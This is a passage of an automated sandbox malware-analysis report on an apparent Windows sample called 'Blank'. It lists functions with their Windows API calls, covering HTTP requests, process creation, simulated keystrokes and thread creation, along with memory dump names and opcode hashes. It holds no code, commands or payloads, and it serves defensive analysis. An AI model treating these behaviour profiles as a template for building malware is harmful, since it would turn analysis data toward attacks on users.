                                                                                                                                    • Instruction Fuzzy Hash: E451B970218205AFD715EF14CC9AFAA7BE5FB84310F10892DF595872E2CB30A966CF52
                                                                                                                                    Function 002D20E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002D211C
                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002D2148
                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 002D218A
                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002D219F
                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002D21AC
                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002D21DC
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 002D2223
                                                                                                                                      • Part of subcall function 002D2B4F: GetLastError.KERNEL32(?,?,002D1EE3,00000000,00000000,00000001), ref: 002D2B64
                                                                                                                                      • Part of subcall function 002D2B4F: SetEvent.KERNEL32(?,?,002D1EE3,00000000,00000000,00000001), ref: 002D2B79
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2603140658-3916222277
                                                                                                                                    • Opcode ID: bca94f71ebc6e5bb94e88cee0da2fa21464110f96efda4f98f55a8f61a13cdd3
                                                                                                                                    • Instruction ID: b833079d082d67cc8046c69d4f082a7d646286e3d1cc8c297b07c4511a486881
                                                                                                                                    • Opcode Fuzzy Hash: bca94f71ebc6e5bb94e88cee0da2fa21464110f96efda4f98f55a8f61a13cdd3
                                                                                                                                    • Instruction Fuzzy Hash: FD418DB1510219BEEB129F50DC89FBBBBACEF18354F104057FA049A242D7B0AD59CBA0
                                                                                                                                    Function 002D9330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,002F0980), ref: 002D9412
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,002F0980), ref: 002D9446
                                                                                                                                    • #164.OLEAUT32(?,?,?,?,?,?,002F0980), ref: 002D95C0
                                                                                                                                    • #6.OLEAUT32(?,?,?,002F0980), ref: 002D95EA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: #164FileFreeLibraryModuleName
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2716333841-0
                                                                                                                                    • Opcode ID: 3ade5fd960750b4e29507e69768c2d38df466b9c510850a6e34f8fe79f36173b
                                                                                                                                    • Instruction ID: 1588037dc3dc5d1b063abf4c71b9d1c76af875e519ca2cdc39a190847e8204b6
                                                                                                                                    • Opcode Fuzzy Hash: 3ade5fd960750b4e29507e69768c2d38df466b9c510850a6e34f8fe79f36173b
                                                                                                                                    • Instruction Fuzzy Hash: 16F12A71A20209EFDF14DF94C884EAEB7B9FF45314F108099F906AB251DB31AE95CB90
                                                                                                                                    Function 002DFD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 002DFD9E
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002DFF31
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002DFF55
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002DFF95
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002DFFB7
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002E0133
                                                                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 002E0165
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002E0194
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002E020B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4090791747-0
                                                                                                                                    • Opcode ID: 0cfd8309449b52473934e6a097ad84d72aa42b13e12e272c88a1763e44424d0e
                                                                                                                                    • Instruction ID: 12038762c3fe4af7460b992abbbefc6a537a6a98463fd98575977eba44ed8cd1
                                                                                                                                    • Opcode Fuzzy Hash: 0cfd8309449b52473934e6a097ad84d72aa42b13e12e272c88a1763e44424d0e
                                                                                                                                    • Instruction Fuzzy Hash: CEE1B031224241DFC714EF24C891B6ABBE1EF85350F14846DF98A9B2A2CB70EC65CF52
                                                                                                                                    Function 002C527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002C4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002C3B8A,?), ref: 002C4BE0
                                                                                                                                      • Part of subcall function 002C4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002C3B8A,?), ref: 002C4BF9
                                                                                                                                      • Part of subcall function 002C4FEC: GetFileAttributesW.KERNEL32(?,002C3BFE), ref: 002C4FED
                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 002C52FB
                                                                                                                                    • _wcscmp.LIBCMT ref: 002C5315
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 002C5330
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 793581249-0
                                                                                                                                    • Opcode ID: 9bdaecd93ff07c178b5c04c2d79874b4b1f7728eed93785c8405282a389ce399
                                                                                                                                    • Instruction ID: 14695a61fb45f996b4483a55c308960303ee112788935a45d3f7af0cbf4ee776
                                                                                                                                    • Opcode Fuzzy Hash: 9bdaecd93ff07c178b5c04c2d79874b4b1f7728eed93785c8405282a389ce399
                                                                                                                                    • Instruction Fuzzy Hash: F75164B10187959BC724EB94D881EDBB3EC9F84340F504A1EB589C3152EF74F698CB56
                                                                                                                                    Function 002E8C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002E8D24
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InvalidateRect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 634782764-0
                                                                                                                                    • Opcode ID: ce3ff833c181cb4a63a51c50d7dfba77332bb47d42c0df16565739397b46a991
                                                                                                                                    • Instruction ID: 1fd7f6332ed450767dc730dd27297408f7da1073ad0c8971d4c21b2300ffb18b
                                                                                                                                    • Opcode Fuzzy Hash: ce3ff833c181cb4a63a51c50d7dfba77332bb47d42c0df16565739397b46a991
                                                                                                                                    • Instruction Fuzzy Hash: 7851D6305A0285BFEF249F26CC89B697BA4BB05360FA40516F598E71E1CF71A9B0DB50
                                                                                                                                    Function 00262F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0029C638
                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0029C65A
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0029C672
                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0029C690
                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0029C6B1
                                                                                                                                    • DestroyIcon.USER32(00000000), ref: 0029C6C0
                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0029C6DD
                                                                                                                                    • DestroyIcon.USER32(?), ref: 0029C6EC
                                                                                                                                      • Part of subcall function 002EAAD4: DeleteObject.GDI32(00000000), ref: 002EAB0D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2819616528-0
                                                                                                                                    • Opcode ID: 74b07e5e65424d1c19f818786a3413b9b0ad2fb6dec1a979f7829a5aa8a2d051
                                                                                                                                    • Instruction ID: d2b9285de6eefe75a0bcceaf2bdcab9d5e619e50ed959b3828d3c782091c3c7c
                                                                                                                                    • Opcode Fuzzy Hash: 74b07e5e65424d1c19f818786a3413b9b0ad2fb6dec1a979f7829a5aa8a2d051
                                                                                                                                    • Instruction Fuzzy Hash: AD516B70620606EFDB24DF24DC85BAA77B9FB44760F204528F946E7690D770ADA0DF50
                                                                                                                                    Function 002BA226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002BB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 002BB54D
                                                                                                                                      • Part of subcall function 002BB52D: GetCurrentThreadId.KERNEL32 ref: 002BB554
                                                                                                                                      • Part of subcall function 002BB52D: AttachThreadInput.USER32(00000000,?,002BA23B,?,00000001), ref: 002BB55B
                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 002BA246
                                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002BA263
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 002BA266
                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 002BA26F
                                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002BA28D
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002BA290
                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 002BA299
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002BA2B0
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002BA2B3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2014098862-0
                                                                                                                                    • Opcode ID: 354de53327cf083715b3ec40f8199cc56259132e4aa6bd952dbdcf48eecc1944
                                                                                                                                    • Instruction ID: 0c37ee0451d5f52783f79e9f124026f35d5010286af73de3bd5003239083c0a5
                                                                                                                                    • Opcode Fuzzy Hash: 354de53327cf083715b3ec40f8199cc56259132e4aa6bd952dbdcf48eecc1944
                                                                                                                                    • Instruction Fuzzy Hash: 1811C2B1950218BEF7106B60AC8DFBA3A1DDB4C7A0F500425F654AB091CAF26C60DAA4
                                                                                                                                    Function 002B94D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,002B915A,00000B00,?,?), ref: 002B94E2
                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,002B915A,00000B00,?,?), ref: 002B94E9
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002B915A,00000B00,?,?), ref: 002B94FE
                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,002B915A,00000B00,?,?), ref: 002B9506
                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,002B915A,00000B00,?,?), ref: 002B9509
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,002B915A,00000B00,?,?), ref: 002B9519
                                                                                                                                    • GetCurrentProcess.KERNEL32(002B915A,00000000,?,002B915A,00000B00,?,?), ref: 002B9521
                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,002B915A,00000B00,?,?), ref: 002B9524
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,002B954A,00000000,00000000,00000000), ref: 002B953E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                    • Opcode ID: 9257fb8187bc636bd6e89a0ee4d8fbe65fe6a276a988389490cfb5a15e5cf234
                                                                                                                                    • Instruction ID: 5b1263cf40e4c47c786cef7df58500f9d0f13c0d2b4ac3928cc3b7bb27743d29
                                                                                                                                    • Opcode Fuzzy Hash: 9257fb8187bc636bd6e89a0ee4d8fbe65fe6a276a988389490cfb5a15e5cf234
                                                                                                                                    • Instruction Fuzzy Hash: 0C01BF75240308BFE710ABA5EC8DF6B7B6CEB89751F414421FA05DB291C6709810CB20
                                                                                                                                    Function 002DA20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                    • API String ID: 0-572801152
                                                                                                                                    • Opcode ID: 2ae537ff2ada50b9e954a6a5979df1f43314a99ee0760470ad3e3ecfdf73ab97
                                                                                                                                    • Instruction ID: 466278d73082866c382cbb1cb09eed77b8980a027572c334ec7a504317055567
                                                                                                                                    • Opcode Fuzzy Hash: 2ae537ff2ada50b9e954a6a5979df1f43314a99ee0760470ad3e3ecfdf73ab97
                                                                                                                                    • Instruction Fuzzy Hash: 88C1A171E2021A9FDF14CFA8D884EAEB7B5BF48354F14846AE905AB380E770ED54CB51
                                                                                                                                    Function 002D97FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset
                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                    • API String ID: 2102423945-625585964
                                                                                                                                    • Opcode ID: 314070a8137b99011519c1f4f3709b8bacb17690ae58d35faf2868adf7d456e4
                                                                                                                                    • Instruction ID: b9c05ff128d24b7a5a8a7591ff0192d1dcae9734bd6816f2f938e4eb721b1c76
                                                                                                                                    • Opcode Fuzzy Hash: 314070a8137b99011519c1f4f3709b8bacb17690ae58d35faf2868adf7d456e4
                                                                                                                                    • Instruction Fuzzy Hash: C2918D71A2021AABDF24CFA5C858FEEB7B8EF45710F10855AF515AB240D7709D94CFA0
                                                                                                                                    Function 002D9E47 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002B7D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002B7C62,80070057,?,?,?,002B8073), ref: 002B7D45
                                                                                                                                      • Part of subcall function 002B7D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002B7C62,80070057,?,?), ref: 002B7D60
                                                                                                                                      • Part of subcall function 002B7D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002B7C62,80070057,?,?), ref: 002B7D6E
                                                                                                                                      • Part of subcall function 002B7D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002B7C62,80070057,?), ref: 002B7D7E
                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 002D9EF0
                                                                                                                                    • _memset.LIBCMT ref: 002D9EFD
                                                                                                                                    • _memset.LIBCMT ref: 002DA040
                                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 002DA06C
                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 002DA077
                                                                                                                                    Strings
                                                                                                                                    • NULL Pointer assignment, xrefs: 002DA0C5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                    • API String ID: 1300414916-2785691316
                                                                                                                                    • Opcode ID: 8014698f831a4b1cb603544770abd4ab04f410fbe2258cbd4f7f6146aabbc59a
                                                                                                                                    • Instruction ID: 53cfb6f44ce3036dc3b50c5df7405d093b0ad7217bbae5631ef56e4f069df19b
                                                                                                                                    • Opcode Fuzzy Hash: 8014698f831a4b1cb603544770abd4ab04f410fbe2258cbd4f7f6146aabbc59a
                                                                                                                                    • Instruction Fuzzy Hash: 6F913971D10229EBDB20DFA4D845EDEBBB8EF08350F10815AF519A7281DB719A64CFA1
                                                                                                                                    Function 002E73A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002E7449
                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 002E745D
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002E7477
                                                                                                                                    • _wcscat.LIBCMT ref: 002E74D2
                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 002E74E9
                                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002E7517
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
